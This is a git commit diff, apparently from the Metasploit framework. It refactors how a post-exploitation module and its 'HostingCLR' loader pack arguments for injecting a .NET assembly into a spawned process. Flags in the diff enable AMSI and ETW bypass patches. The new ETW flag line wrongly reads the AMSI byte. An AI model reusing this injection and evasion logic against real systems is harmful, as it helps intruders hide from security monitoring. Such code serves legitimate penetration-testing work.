Adjust how HostingCLR arguments are packed

2020-11-09 12:24:55 -05:00
parent ddd9af83b9
commit 0ccb50ac02
5 changed files with 31 additions and 32 deletions
@@ -0,0 +1,2 @@
+HostingCLR*
+!HostCLR*.dll
@@ -0,0 +1,2 @@
+HostingCLR/Release/*
+HostingCLR/x64/*
@@ -19,8 +19,8 @@
 #define MethodJittingStarted 145
 #define ILStubGenerated 88

-unsigned char amsiflag[1];
-unsigned char etwflag[1];
+bool amsiflag;
+bool etwflag;
 unsigned char signflag[1];

 char sig_40[] = { 0x76,0x34,0x2E,0x30,0x2E,0x33,0x30,0x33,0x31,0x39 };
@@ -113,11 +113,11 @@ int executeSharp(LPVOID lpPayload)
 	//Taking pointer to amsi
 	unsigned char *offsetamsi = allData + 8;
 	//Store amsi flag 
-	memcpy(amsiflag, offsetamsi, 1);
+	amsiflag = (offsetamsi[0] != 0);

 	unsigned char *offsetetw = allData + 9;
-	//Store amsi flag 
-	memcpy(etwflag, offsetetw, 1);
+	//Store etw flag 
+	etwflag = (offsetamsi[0] != 0);

 	unsigned char *offsetsign = allData + 10;
 	//Store sihnature flag 
@@ -153,7 +153,7 @@ int executeSharp(LPVOID lpPayload)
 	}

 	//Etw bypass
-	if (etwflag[0] == '\x01')
+	if (etwflag)
 	{
 		int ptcResult = PatchEtw();
 		if (ptcResult == -1)
@@ -238,7 +238,7 @@ int executeSharp(LPVOID lpPayload)
 	}

 	//Amsi bypass
-	if (amsiflag[0] == '\x01')
+	if (amsiflag)
 	{
 		int ptcResult = PatchAmsi();
 		if (ptcResult == -1)
@@ -13,6 +13,11 @@ class MetasploitModule < Msf::Post
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Dotnet

+  SIGNATURES = {
+    'Main()' => 1,
+    'Main(string[])' => 2
+  }.freeze
+
  def initialize(info = {})
    super(
      update_info(
@@ -38,7 +43,7 @@ class MetasploitModule < Msf::Post
      [
        OptPath.new('DOTNET_EXE', [true, 'Assembly file name']),
        OptString.new('ARGUMENTS', [false, 'Command line arguments']),
-        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic', 'Main()', 'Main(string[])']]),
+        OptEnum.new('Signature', [true, 'The Main function signature', 'Automatic', ['Automatic'] + SIGNATURES.keys]),
        OptString.new('PROCESS', [false, 'Process to spawn', 'notepad.exe']),
        OptString.new('USETHREADTOKEN', [false, 'Spawn process with thread impersonation', true]),
        OptInt.new('PID', [false, 'Pid  to inject', 0]),
@@ -234,35 +239,25 @@ class MetasploitModule < Msf::Post
    etw_flag_size = 1
    assembly_size = File.size(exe_path)

-    cln_params = ""
-    case datastore['Signature']
-    when 'Automatic'
-      signature = datastore['ARGUMENTS'].blank? ? "\x01" : "\x02"
-    when 'Main()'
-      signature = "\x01"
-    when 'Main(string[])'
-      signature = "\x02"
-      cln_params << datastore['ARGUMENTS']
+    cln_params = ''
+    if datastore['Signature'] == 'Automatic'
+      signature = datastore['ARGUMENTS'].blank? ? SIGNATURES['Main()'] : SIGNATURES['Main(string[])']
+    else
+      signature = SIGNATURES.fetch(datastore['Signature'])
    end
+    cln_params << datastore['ARGUMENTS'] if signature == SIGNATURES['Main(string[])']
    cln_params << "\x00"
-    argssize = cln_params.length

    payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
-    payload_size += assembly_size + argssize
+    payload_size += assembly_size + cln_params.length
    assembly_mem = process.memory.allocate(payload_size, PAGE_READWRITE)
-    params = [assembly_size].pack('I*')
-    params += [argssize].pack('I*')
-    if datastore['AMSIBYPASS'] == true
-      params += "\x01"
-    else
-      params += "\x02"
-    end
-    if datastore['ETWBYPASS'] == true
-      params += "\x01"
-    else
-      params += "\x02"
-    end
-    params += signature
+    params = [
+      assembly_size,
+      cln_params.length,
+      datastore['AMSIBYPASS'] ? 1 : 0,
+      datastore['ETWBYPASS'] ? 1 : 0,
+      signature
+    ].pack('IICCC')
    params += cln_params

    process.memory.write(assembly_mem, params + File.read(exe_path))